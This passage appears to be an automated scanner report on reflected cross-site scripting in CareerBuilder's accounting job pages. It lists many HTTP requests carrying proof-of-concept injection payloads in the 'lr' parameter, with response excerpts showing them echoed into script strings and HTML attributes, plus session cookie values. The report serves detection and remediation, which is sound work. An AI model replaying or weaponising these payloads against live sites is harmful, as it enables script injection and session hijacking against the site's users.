GET /ag.ic/Florida_Miamicca06'%3b229e8665375?lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5&sc=1&ff=21&excrit=QID=A3853799236048;st=a;use=ALL;TID=0;CTY=Miami;SID=FL;CID=US;ENR=NO;DTP=DRNS;YDI=YES;IND=ALL;PDQ=All;PDQ=All;PAYL=0;PAYH=gt120;POY=NO;ETD=ALL;RE=ALL;MGT=DC;SUP=DC;FRE=30;CHL=ag;QS=sid_unknown;SS=NO;TITL=0;OB=-modifiedint;RAD=30;JQT=RAD;JDV=False;ExpHigh=gt50;ExpLow=0;MaxLowExp=-1 HTTP/1.1 Host: accounting.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 193512 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: florida_miamicca06';229e8665375:mxdl41=pg=1&sc=1&sd=0; path=/ X-Powered-By: ASP.NET X-PBY: BEAR8 Date: Sun, 14 Nov 2010 23:17:55 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miamic ...[SNIP]... <script language="JavaScript"> var googlekw = 'Miamicca06';229E8665375 Accounting Jobs on CareerBuilder.com'; </script> ...[SNIP]...
The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58a13"%20a%3db%207e7fcc80efe was submitted in the lr parameter. This input was echoed as 58a13" a=b 7e7fcc80efe in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ag.ic/Florida_Miami?lr=cbcb_mhf48aa58a13"%20a%3db%207e7fcc80efe HTTP/1.1 Host: accounting.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 191257 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: florida_miami:mxdl41=pg=1&sc=-1&sd=0; path=/ X-Powered-By: ASP.NET X-PBY: BEAR44 Date: Sun, 14 Nov 2010 23:05:15 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 59906'-alert(1)-'795c61b5e19 was submitted in the lr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ag.ic/Florida_Miami?lr=cbcb_mhf48aa59906'-alert(1)-'795c61b5e19 HTTP/1.1 Host: accounting.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 191944 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: florida_miami:mxdl41=pg=1&sc=-1&sd=0; path=/ X-Powered-By: ASP.NET X-PBY: BEAR4 Date: Sun, 14 Nov 2010 23:06:10 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... ntroHTML = 'The feature you requested is only available to members. Please sign in to continue...'; CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mhf48aa59906'-alert(1)-'795c61b5e19&ff=21'; CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later."; CB.AJAX ...[SNIP]...
The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f48aa'-alert(1)-'9d78db8d0a5 was submitted in the lr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ag.ic/Florida_Miami/?lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5&SiteID=cbcb_mh031 HTTP/1.1 Host: accounting.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 190697 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/ Set-Cookie: CB%5FSID=742b47a46d174153b38634de2ce397ba-343070627-RE-4; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC6502B7EE094B552B2B70BBA9219CA94E77CE10351649902F41F8211398221DB738F2E1EB2D4C61F7C85; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:23:46 GMT; path=/; HttpOnly Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:38:46 GMT; path=/ X-Powered-By: ASP.NET X-PBY: REBEL14 Date: Sun, 14 Nov 2010 22:23:46 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... in._introHTML = 'The feature you requested is only available to members. Please sign in to continue...'; CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5&ff=21'; CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later."; CB.AJAX ...[SNIP]...
The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e36f"%20a%3db%20a374526cf1f was submitted in the lr parameter. This input was echoed as 3e36f" a=b a374526cf1f in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ag.ic/Florida_Miami/?lr=cbcb_mh3e36f"%20a%3db%20a374526cf1f&SiteID=cbcb_mh031 HTTP/1.1 Host: accounting.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 190052 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/ Set-Cookie: CB%5FSID=4c1214c5309e47ab9c6e1f3f48696a30-343070602-R8-4; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC6508CD4B507BB40F27D5D49BB4DD41970517DAD82ED8DF2ADD73243653D37836DEF1D333B1CB075ACFF; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:23:22 GMT; path=/; HttpOnly Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:38:22 GMT; path=/ X-Powered-By: ASP.NET X-PBY: REBEL8 Date: Sun, 14 Nov 2010 22:23:21 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9012c"%20a%3db%20369a2cb1a28 was submitted in the lr parameter. This input was echoed as 9012c" a=b 369a2cb1a28 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ag.ic/Florida_Miami_Accounting.htm?IPath=OCP&lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a59012c"%20a%3db%20369a2cb1a28&ff=21 HTTP/1.1 Host: accounting.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 196910 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: florida_miami_accounting.htm:mxdl41=pg=1&sc=-1&sd=0; path=/ X-Powered-By: ASP.NET X-PBY: BEAR44 Date: Sun, 14 Nov 2010 23:06:07 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ec784'-alert(1)-'194462e6124 was submitted in the lr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ag.ic/Florida_Miami_Accounting.htm?IPath=OCP&lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5ec784'-alert(1)-'194462e6124&ff=21 HTTP/1.1 Host: accounting.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 197437 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: florida_miami_accounting.htm:mxdl41=pg=1&sc=-1&sd=0; path=/ X-Powered-By: ASP.NET X-PBY: BEAR22 Date: Sun, 14 Nov 2010 23:08:59 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... you requested is only available to members. Please sign in to continue...'; CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5ec784'-alert(1)-'194462e6124&ff=21'; CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later."; CB.AJAX ...[SNIP]...
The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c701a'-alert(1)-'781f62259bc was submitted in the lr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ag.ic/Florida_Miami_AccountsPayable.htm?IPath=OCP&lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5c701a'-alert(1)-'781f62259bc&ff=21 HTTP/1.1 Host: accounting.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 197657 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: florida_miami_accountspayable.htm:mxdl41=pg=1&sc=-1&sd=0; path=/ X-Powered-By: ASP.NET X-PBY: BEAR32 Date: Sun, 14 Nov 2010 23:06:20 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... you requested is only available to members. Please sign in to continue...'; CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5c701a'-alert(1)-'781f62259bc&ff=21'; CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later."; CB.AJAX ...[SNIP]...
The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f1a9"%20a%3db%20e961c1b811c was submitted in the lr parameter. This input was echoed as 9f1a9" a=b e961c1b811c in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ag.ic/Florida_Miami_AccountsPayable.htm?IPath=OCP&lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a59f1a9"%20a%3db%20e961c1b811c&ff=21 HTTP/1.1 Host: accounting.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 197275 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: florida_miami_accountspayable.htm:mxdl41=pg=1&sc=-1&sd=0; path=/ X-Powered-By: ASP.NET X-PBY: BEAR41 Date: Sun, 14 Nov 2010 23:05:20 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7ba5c'-alert(1)-'68fa7d568e0 was submitted in the lr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ag.ic/Florida_Miami_AccountsReceivable.htm?IPath=OCP&lr=cbcb_mhf48aa7ba5c'-alert(1)-'68fa7d568e0 HTTP/1.1 Host: accounting.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 190323 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: florida_miami_accountsreceivable.htm:mxdl41=pg=1&sc=-1&sd=0; path=/ X-Powered-By: ASP.NET X-PBY: BEAR14 Date: Sun, 14 Nov 2010 23:14:45 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... ntroHTML = 'The feature you requested is only available to members. Please sign in to continue...'; CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mhf48aa7ba5c'-alert(1)-'68fa7d568e0&ff=21'; CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later."; CB.AJAX ...[SNIP]...
The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be2ee"%20a%3db%20fed0e7e8bc3 was submitted in the lr parameter. This input was echoed as be2ee" a=b fed0e7e8bc3 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ag.ic/Florida_Miami_AccountsReceivable.htm?IPath=OCP&lr=cbcb_mhf48aabe2ee"%20a%3db%20fed0e7e8bc3 HTTP/1.1 Host: accounting.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 195095 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: jobresults.aspx:mxdl41=pg=1&sc=-1&sd=0; path=/ X-Powered-By: ASP.NET X-PBY: BEAR1 Date: Sun, 14 Nov 2010 23:11:31 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7154c'-alert(1)-'d6bb816219f was submitted in the lr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ag.ic/Florida_Miami_Auditing.htm?IPath=OCP&lr=cbcb_mhf48aa7154c'-alert(1)-'d6bb816219f HTTP/1.1 Host: accounting.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 190040 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: florida_miami_auditing.htm:mxdl41=pg=1&sc=-1&sd=0; path=/ X-Powered-By: ASP.NET X-PBY: BEAR37 Date: Sun, 14 Nov 2010 23:13:08 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... ntroHTML = 'The feature you requested is only available to members. Please sign in to continue...'; CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mhf48aa7154c'-alert(1)-'d6bb816219f&ff=21'; CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later."; CB.AJAX ...[SNIP]...
The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2cdbc"%20a%3db%205fc987899df was submitted in the lr parameter. This input was echoed as 2cdbc" a=b 5fc987899df in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ag.ic/Florida_Miami_Auditing.htm?IPath=OCP&lr=cbcb_mhf48aa2cdbc"%20a%3db%205fc987899df HTTP/1.1 Host: accounting.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 189439 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: florida_miami_auditing.htm:mxdl41=pg=1&sc=-1&sd=0; path=/ X-Powered-By: ASP.NET X-PBY: BEAR37 Date: Sun, 14 Nov 2010 23:09:49 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b07c4'-alert(1)-'57936a51b86 was submitted in the lr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ag.ic/Florida_Miami_Bookkeeping.htm?IPath=OCP&lr=cbcb_mhf48aab07c4'-alert(1)-'57936a51b86 HTTP/1.1 Host: accounting.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 190038 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: florida_miami_bookkeeping.htm:mxdl41=pg=1&sc=-1&sd=0; path=/ X-Powered-By: ASP.NET X-PBY: BEAR44 Date: Sun, 14 Nov 2010 23:12:58 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... ntroHTML = 'The feature you requested is only available to members. Please sign in to continue...'; CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mhf48aab07c4'-alert(1)-'57936a51b86&ff=21'; CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later."; CB.AJAX ...[SNIP]...
The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45eed"%20a%3db%206df7f904442 was submitted in the lr parameter. This input was echoed as 45eed" a=b 6df7f904442 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ag.ic/Florida_Miami_Bookkeeping.htm?IPath=OCP&lr=cbcb_mhf48aa45eed"%20a%3db%206df7f904442 HTTP/1.1 Host: accounting.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 189492 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: florida_miami_bookkeeping.htm:mxdl41=pg=1&sc=-1&sd=0; path=/ X-Powered-By: ASP.NET X-PBY: BEAR44 Date: Sun, 14 Nov 2010 23:10:13 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3f293'-alert(1)-'786db9e58ce was submitted in the lr parameter. This input was echoed unmodified in the application's response.
